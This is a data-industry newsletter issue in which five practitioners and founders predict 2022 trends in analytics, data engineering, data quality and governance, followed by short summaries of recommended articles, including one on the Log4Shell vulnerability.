The hype around data is not dying. Billions have been shoveled into different start-ups in 2021. All of these start-ups are focused on data ingestion, data storage, data visualization, machine learning, and just about every other method to manage or process data that exists.
But where is this all going?
What data trends are here to stay and what is coming next?
Truthfully, no one knows. But the more perspectives we can get from experts, the more likely we are to see what is coming.
In this article, I asked 5 experts that range from founders of data start-ups like Hyperquery to data engineers trying to deliver value to their counterparts on a daily basis. Each brought great perspective on the question, where is data going in 2022.
So let’s dive in.
Robert Yi— Co-founder @ Hyperquery
The modern data stack has greatly matured over the past few years, to the point where anyone can stand up fully functional warehouse-centric data infra in a matter of hours. But there’s still a huge blank spot in one thin slice of the MDS that’s always hand-waved away — analytics. There are a ton of BI tools in the space that enable analysis, but these tools are trying to build deeper and deeper technical solutions, but what these companies fail to recognize is that the most painful problems we are facing in analytics these days are rarely technical.
In my estimation, one aspect of analytics work that is being underserved is collaboration. Analytics is fundamentally a collaborative enterprise — you never do analytics in a vacuum the way that you might deploy machine learning models or push code. Your work is only inherently valuable insofar as it can be used to inform a decision. But instead, work is done in IDEs and opaque dashboarding tools, shared in Google docs only to quickly disappear into the ether after a single point of collaboration. But collaboration in modern data teams isn’t point-in-time, doc-based coexistence — it’s about having a common shared space that enables knowledge sharing and discovery. But the issue is rooted more deeply — anyone who’s worked in product analytics will tell you that the real pain comes from how poorly analyses are organized, how difficult they are to reproduce, how hard past work is to discover.
We’ve gone the route of trying to build a modern data workspace that directly solves these organizational/collaborative painpoints by putting everything in one accessible, collaborative place (Hyperquery), and obviously I’d love to see us become the solution to writing and sharing analyses. But our bet and solution shape aside, it’s going to be exciting to see how modern organizations built using modern tooling will start to solve these issues!
Chanin Nantasenamat, Ph.D. — Developer Advocate at Streamlit (Previously an ex-University Professor in Bioinformatics) - Data Professor
In harnessing the powers of data science, the acquisition of the necessary skill sets needed for transforming data to actionable insights is no easy endeavor. I’ll be using my personal account of working in academia as an example, which spans almost 20 years as both a PhD student and Professor in the field of bioinformatics. The requisite skill sets in data science is best illustrated by the famous Venn diagram that describes it broadly as the intersection of (1) domain knowledge, (2) computer science and (3) math/statistics. Those coming from a STEM background should be fairly comfortable with 2 of these skill sets namely domain knowledge and math/statistics.
Firstly, the most important skill set is the ability to learn. After being in the data field for the past 15 years, I am always fascinated with the constantly evolving nature of the field and find myself constantly learning new concepts, algorithms, Python libraries/R packages, etc. In academia, the fast paced nature of scientific research calls for novelty in the presented research that are submitted for publication in scientific journals. In my field of study (bioinformatics), novelty may come from the data, the experimental technique or the data analytic approach.
Perhaps the most difficult would be coding skills, which is starting to become less of an issue in this day and age where schools and universities are embracing the teaching of coding such as Scratch and Python. Back in the days, at least for me, I’ve found that learning to code was quite a challenge as it took me several trial and errors before I could become comfortable with the logic and high-level concepts as well as the syntax. Although, I consider myself a self-taught programmer where I mostly consulted books and web tutorials during the course of my learning journey. There were times where talking to a colleague who is more experienced in coding does really help to clear a lot of questions that arise where no books may have answers to. Therefore, having a peer or mentor to talk to during the learning journey may help to speed up the learning journey. I find that by asking lots of questions to clear up any doubt regarding the concept and syntax really helps make the learning experience worthwhile.
Another often overlooked but important skill set pertains to non-technical skill such as communication. Oftentimes, at the end of any data science projects we will have to summarize all of the newfound knowledge into a logical set of results tables and figures along with insights and conclusions that are drawn from the analysis. Aside from written communication of results and insights the ability to give precise verbal delivery of these information to audiences and stakeholders may make or break any data projects.
Andreas Kretz— CEO Of Learn Data Engineering - Youtube Channel
My prediction for 2022 is that we see companies focus on Data Engineering even more. Very often the science part is now figured out, but the engineering is still either not there or in a “slapped together” proof of concept phase. There will be a huge demand on engineers in charge of platform and pipeline architecture and devops.
Another thing we see in the past months is a coming hype of Data Lakes and Data Warehouse integration. Very often you hear the term Lakehouse architecture. It’s something really worth looking into.
Because of this demand for good engineers I am putting a great effort towards my educational content. Adding even more courses to my Data Engineering Academy as well as starting a recruiting service for students.
mehdio — Data Engineer @ Back Market - mehdio DataTV
Launching a data stack for a data project has never been easier. A lot of previous data challenges (managing clusters, analytical database, hardware servers) have been solved by SAAS/Cloud services. To ingest data, we have platforms like Fivetran/Airbyte that prevent us to write custom integration code and for transformation, we have mature frameworks/platforms like dbt, databricks, AWS Glue, etc. For analytics, Cloud Data Warehouse has been rising. BigQuery, Snowflake, Firebolt, plenty of choices again!
With that in mind, the new kids in town of Data SAAS products are popping around the next biggest data challenge: data catalog, data quality, and data lineage. Proof of that is a lot of initial OpenSource projects like GreatExpectations, Datahub, Amundsen are starting now commercial products. Next to that, we have new platforms like Castor, Soda, Datafold, and Monte Carlo just to list a few. And the big players like Databricks & GCP are also diving into that topic (unity catalog, GCP data catalog).
What’s next for 2022? Well, all these tools are still pretty young and not widely adopted. Besides, this will create a drift in the organization as data quality check stays at the moment, in most of the company, a technical job. So enabling good communication between technical people (Data Engineer/Data Scientist) & Business with a proper platform would be key. The same challenge for data catalog. There is a need to have a good loop between business documentation and technical documentation.
George Firican — Founder of LightsOnData | Podcast Host: Lights On Data Show
The challenge with the majority of organizations that want to be data-driven is that they are either doing the bare minimum or they want to jump critical steps and get straight into acquiring data analytics, ML and AI capabilities. The problem? Neither of them is focusing on establishing and solidifying a foundation for their data-driven capabilities to grow on. Most are skipping the data management and data governance steps. That’s just like planting a beautiful flower into the desert. Without a nourishing soil and appropriate environment, that flower won’t last long.
Sure, it’s easier to convince management to invest in a fancy AI program that promises incredible ROI, rather than investing time and resources in implementing a data governance program that many don’t even understand what it means.
But without a solid data management and data governance foundation, that AI program will probably fail or at the very least its ROI will not reach its full potential. That beautiful will wilt quickly or never bloom. Organizations who want to truly become data-driven, need to understand the entire effort required to reach that state. They need to understand that to gain sustainable data analytics and ML/AI capabilities, one first needs to have a solid data management and data governance foundation.
Where Is Your Data Strategy Going In 2022?
2021 is over (in a few days).
And everything is growing in terms of data. A popularity in data engineering, our understanding of data science and where it fits, and of course…my Youtube Channel.
So after reading these 5 big data experts opinions on data trends, what are your thoughts?
Thanks To The SDG Community
I started writing this weekly update more seriously about 17-18 weeks ago. Since then I have gained hundreds of new subscribers as well as 30 supporters! I even got 30 special thanks on Youtube!
And all I can say is, Thank You!
You guys are keeping me motivated.
Also, if you’re interested in reading some of our past issues such as Greylock VC and 5 Data Analytics Companies It Invests or The Future Of Data Science, Data Engineering
Then consider subscribing and supporting the community!
Video Of The Week - I Quit My Job At Facebook
Is it really official if it’s not Youtube official.
Articles Worth Reading
There are 20,000 new articles posted on Medium daily and that’s just Medium! I have spent a lot of time sifting through some of these articles as well as TechCrunch and companies tech blog and wanted to share some of my favorites!
What is Metabase? — A Clean Analytics Platform
“Metabase is an open source business intelligence tool. It lets you ask questions about your data, and displays answers in formats that make sense, whether that’s a bar graph or a detailed table.
Your questions can be saved for later, making it easy to come back to them, or you can group questions into great looking dashboards. Metabase also makes it easy to share questions and dashboards with the rest of your team.” -Metabase
6 inconvenient truths about Apache Airflow (and what to do about them)
Data teams that work with complex ingestion processes love Apache Airflow.
You can define your workflows in Python, the system has wide-ranging extensibility, and it offers a healthy breadth of plugins. Eighty-six percent of its users say they’re happy and plan to continue using it over other workflow engines. An equal number say they recommend the product.
But, like all software, and especially the open source kind, Airflow is plagued by a battery of gaps and shortcomings you’ll need to compensate for. For developers just getting acquainted with it, that means the starting is slow and the going is tough. In this article, we discuss those issues and a few possible workarounds.
The Log4j Log4Shell vulnerability: Overview, detection, and remediation
On December 9, 2021, a critical vulnerability in the popular Log4j Java logging library was disclosed and nicknamed Log4Shell. The vulnerability is tracked as CVE-2021-44228 and is a remote code execution vulnerability that can give an attacker full control of any impacted system.
In this blog post, we will:
provide key points and observations about Log4Shell from our research at Datadog
cover methods for identifying and securing vulnerable systems, and
describe the exploit chain in more detail
We will also look at how to leverage Datadog to protect your infrastructure and applications. Finally, we will provide some intelligence about exploitation attempts in the wild, showcasing how attackers are using this vulnerability.
Note: An official statement detailing how Datadog responded internally to this vulnerability is available here.
End Of Day 30
Thanks for checking out our community. We put out 3-4 Newsletters a week discussing data, tech, and start-ups.
If you want to learn more, then sign up today. Feel free to sign up for no cost to keep getting these newsletters.
Couldn't agree more with all the predictions! Data engineer's demand will be evident in this 2022. Also, I think DE's role is going to start evolving faster. Nowadays its relatively easy to set up a data infrastructure and handle data operations by using SaaS products, therefore, our role will be more focused on choosing the most appropriate stack and integrating data quality / data catalog capabilities to the existing ecosystems where we work.